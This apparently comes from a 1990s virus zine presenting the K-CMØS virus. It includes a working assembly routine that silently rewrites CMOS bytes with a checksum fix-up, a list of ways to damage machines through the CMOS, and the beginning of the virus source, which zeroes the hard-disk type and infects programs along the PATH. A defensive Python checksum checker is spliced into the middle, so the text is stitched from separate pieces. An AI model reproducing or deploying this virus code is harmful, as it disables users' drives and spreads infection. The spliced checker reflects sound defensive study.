k-cmos.asm
CMOS_CHCKSM:
; INPUT:
; DL = CMOS ADDRESS of BYTE TO be MODIFIED
; BL = NEW BYTE VALUE to be PUT IN CMOS RAM
;      (the routine adds the whole of BX and subtracts the whole of AX,
;       so it relies on BH being 0 on entry and on AH staying 0)
; OUTPUT:
; None.
; REGISTERS USED: AX,CX,BX,DX
;*************************
; GET CMOS Checksum => CX
;*************************
xor ax,ax
mov al,2Eh ;msb of checksum address
out 70h,al ;send address / control byte
in al,71h ;read byte
xchg ch,al ;store al in ch
mov al,2Fh ;lsb of checksum address
out 70h,al ;send address / control byte
in al,71h ;read byte
xchg cl,al ;store lsb to cl
;*********************
; Fix CMOS Checksum
;*********************
push dx
xchg dl,al ;AL = address
out 70h,al ;send address / control byte
in al,71h ;read register
sub cx,ax ;subtract from checksum
add cx,bx ;update checksum value in register.
;****************************
; Write CMOS byte to Address
;****************************
pop dx
xchg dl,al ;AL = address
out 70h,al ;specify CMOS address
xchg al,bl ;new CMOS value => al
out 71h,al ;write new CMOS byte
;*********************
; Write CMOS Checksum
;*********************
mov al,2Eh ;address of checksum's msb
out 70h,al ;specify CMOS address
xchg al,ch ;msb of new checksum
out 71h,al ;write new CMOS msb
mov al,2Fh ;address of checksum's lsb
out 70h,al ;specify CMOS address
xchg al,cl ;lsb of new checksum
out 71h,al ;write new CMOS lsb
ret
;==============================================================================
It is worth mentioning that on XT (8088) type computers, which
have no CMOS RAM, the CMOS routine will have no adverse effect
on the execution of the virus-infected program.
There are many intriguing features of CMOS-attacking
viruses. The biggest one is that the interaction between
software and the CMOS is not stopped by common memory-resident
anti-virus programs. The most talked about example of such
a virus is the South African EXEbug, which uses CMOS
manipulation to make itself difficult to remove from an
infected hard disk. EXEbug massages the CMOS so that if
the machine is booted from a diskette and the virus is
not in memory, the infected hard disk is not recognized.
The list of possible problems created by a CMOS-attacking
virus is long:
1 - CMOS checksum errors.
This will force the user to reenter all of the CMOS data.
Change any value in the correct CMOS range without
updating the checksum.
2 - Dead disk / hard drives.
This could drive the uninformed to presume they have
encountered a hardware problem.
3 - Changed hard drive types, horrendous hard drive problems.
For example: read the hard drive type byte, subtract some small
number from it and write the byte back to the CMOS (the checksum
must be fixed!), and a horrible mess results on the next
boot up.
4 - Changed dates, times, etc.
The uninformed could think the NiCad battery has died,
or that his/her computer is possessed by evil Nigerian
deities.
5 - Changed BIOS passwords, inability to access a computer.
On newer AMI BIOSes you can set or change the password
required to access the computer. This topic was discussed
briefly in a recent issue of Virus News International, the
upshot being that the unsuspecting could be flummoxed into
throwing the computer out the window or, more realistically,
calling a technician. Where some knowledge about
computers is present, the case is opened and the jumper
found to short the CMOS. (No, you don't have to disconnect
the battery. And you didn't throw out your machine manuals,
did you?)
Although many anti-virus programs can save and restore
your CMOS values as part of their function, currently there
is only one memory resident program that checks for changes
in the CMOS: Thunderbyte's TBMEM.
This month's example, K-CMØS, falls in category #2: it
kills all fixed disk drives by zeroing out location 12h in
the CMOS RAM. It also has some encryption abilities (a 16-
byte constant decryptor) and a PATH-style infection routine
that actually works!
Needless to say, careful handling is necessary as it can
spread quite rapidly.
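As an added example (not part of the article or of the K-CMØS source), here is a Python checker for the CMOS image that the routine at the top of the file manipulates: it recomputes the AT BIOS checksum stored at 2Eh/2Fh and diffs a saved baseline against a current image, which is the kind of check a change-monitoring tool like the TBMEM mentioned above must perform, since a write that fixes up the checksum passes the BIOS's own test. The 64-byte image, the checksummed range 10h..2Dh, the volatile RTC/status range and the sample drive/memory bytes are assumptions constructed inline and noted in the comments.

```python
"""CMOS integrity check: verify the AT checksum and diff an image against a saved baseline."""

CHECKSUM_RANGE = range(0x10, 0x2E)       # assumed: bytes covered by the standard AT BIOS checksum
CHECKSUM_MSB, CHECKSUM_LSB = 0x2E, 0x2F  # stored high byte first, as the routine above does
VOLATILE = set(range(0x00, 0x0E))        # assumed: RTC time/date/alarm and status A-D change on their own
FIXED_DISK_TYPES = 0x12                  # the byte K-CMOS zeroes (C: type in high nibble, D: in low)


def cmos_checksum(image: bytes) -> int:
    """16-bit sum of bytes 10h..2Dh, the value the BIOS expects at 2Eh/2Fh."""
    return sum(image[i] for i in CHECKSUM_RANGE) & 0xFFFF


def stored_checksum(image: bytes) -> int:
    return (image[CHECKSUM_MSB] << 8) | image[CHECKSUM_LSB]


def checksum_ok(image: bytes) -> bool:
    return cmos_checksum(image) == stored_checksum(image)


def write_checksum(image: bytearray) -> None:
    cs = cmos_checksum(image)
    image[CHECKSUM_MSB], image[CHECKSUM_LSB] = cs >> 8, cs & 0xFF


def diff_images(baseline: bytes, current: bytes) -> dict:
    """{addr: (old, new)} for every non-volatile byte that differs from the baseline."""
    return {a: (baseline[a], current[a]) for a in range(len(baseline))
            if a not in VOLATILE and baseline[a] != current[a]}


def make_baseline() -> bytes:
    """Constructed sample image: one user-defined (type 47) drive on C:, 640 KB base memory."""
    img = bytearray(64)
    img[FIXED_DISK_TYPES] = 0xF0        # C: extended type (real type in 19h), D: none
    img[0x19] = 47                      # C: drive type 47 (user-defined geometry)
    img[0x15], img[0x16] = 0x80, 0x02   # base memory 640 KB (0x0280), low byte first
    write_checksum(img)
    return bytes(img)


def simulate_write(image: bytes, addr: int, value: int, fix_checksum: bool) -> bytes:
    """Copy of the image with one byte changed, with or without the checksum fix-up."""
    img = bytearray(image)
    img[addr] = value
    if fix_checksum:
        write_checksum(img)
    return bytes(img)


if __name__ == "__main__":
    base = make_baseline()
    crude = simulate_write(base, FIXED_DISK_TYPES, 0, fix_checksum=False)   # BIOS reports a checksum error
    stealthy = simulate_write(base, FIXED_DISK_TYPES, 0, fix_checksum=True) # only a baseline diff catches this
    print(checksum_ok(base), checksum_ok(crude), checksum_ok(stealthy))
    print({hex(a): v for a, v in diff_images(base, stealthy).items()})
```

The diff also flags 2Eh/2Fh themselves, which is a useful tell: a legitimate configuration change moves the checksum together with a byte the user edited in Setup, while a changed type byte with no matching Setup session is worth investigating.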
Important: Since K-CMØS zeros the CMOS value for the fixed
disk on execution, unless you restore the value before ending
your experiment with some software CMOS reloading tool, you
will have a dead C: drive when you finally get around to
rebooting. Keep in mind that if you don't know how to reset
your CMOS on power up using the built-in BIOS setup, you will
sit there in a dumb stew wondering why you ran a virus which
unhooked your hard drive.
To prevent this from happening, you must familiarize yourself
with the BIOS setup program. Here is a brief walkthrough which
could be used to properly restore your machine after K-CMOS
has altered your CMOS:
1 - BEFORE you execute K-CMOS - on power up, bring up your
BIOS setup by holding down the DEL key while you are booting
the computer.
2 - You will probably see a screen with a number of selections.
You will want to bring up "Change Basic CMOS Settings" or its
equivalent. Write down the values for the HD types on drives
C and D.
3 - IF the hard drive types are "47" then you MUST record all
of the data in the displayed fields, i.e., the information
such as the number of heads, sectors, etc. Again, you MUST
do this BEFORE you run K-CMØS or you will have to look in
your manuals somewhere to get the specific HD information!
NOTE: Newer AMI BIOSes have an auto-detect feature in the
Setup menu, so you might not have to worry about hard disk type
number, number of sectors, number of heads, etc., if you have
the feature in your computer's BIOS. The setup will do the
work for you.
4 - Now that you've recorded this data, you can test K-CMØS
and watch it unhook your system. On reboot, you will lose the
hard disk. Reboot, bring up your Setup program as above,
reenter the values for the hard disk which you previously
recorded, exit and save. You are back in business.
Enjoy!
$
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; K-CMØS.ASM
; AUTHOR: Köhntark
; DATE: November 93
; Size: < 1100 bytes
;
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
MAIN SEGMENT BYTE
ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file
ORG 100h
;**********************************
; fake host program
;**********************************
HOST:
db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS
db ' '
db 90h,90h,90h
mov ah,4CH
mov al,0
int 21H ;terminate normally with dos
;════════════════════════════════════════════════════════════════════════════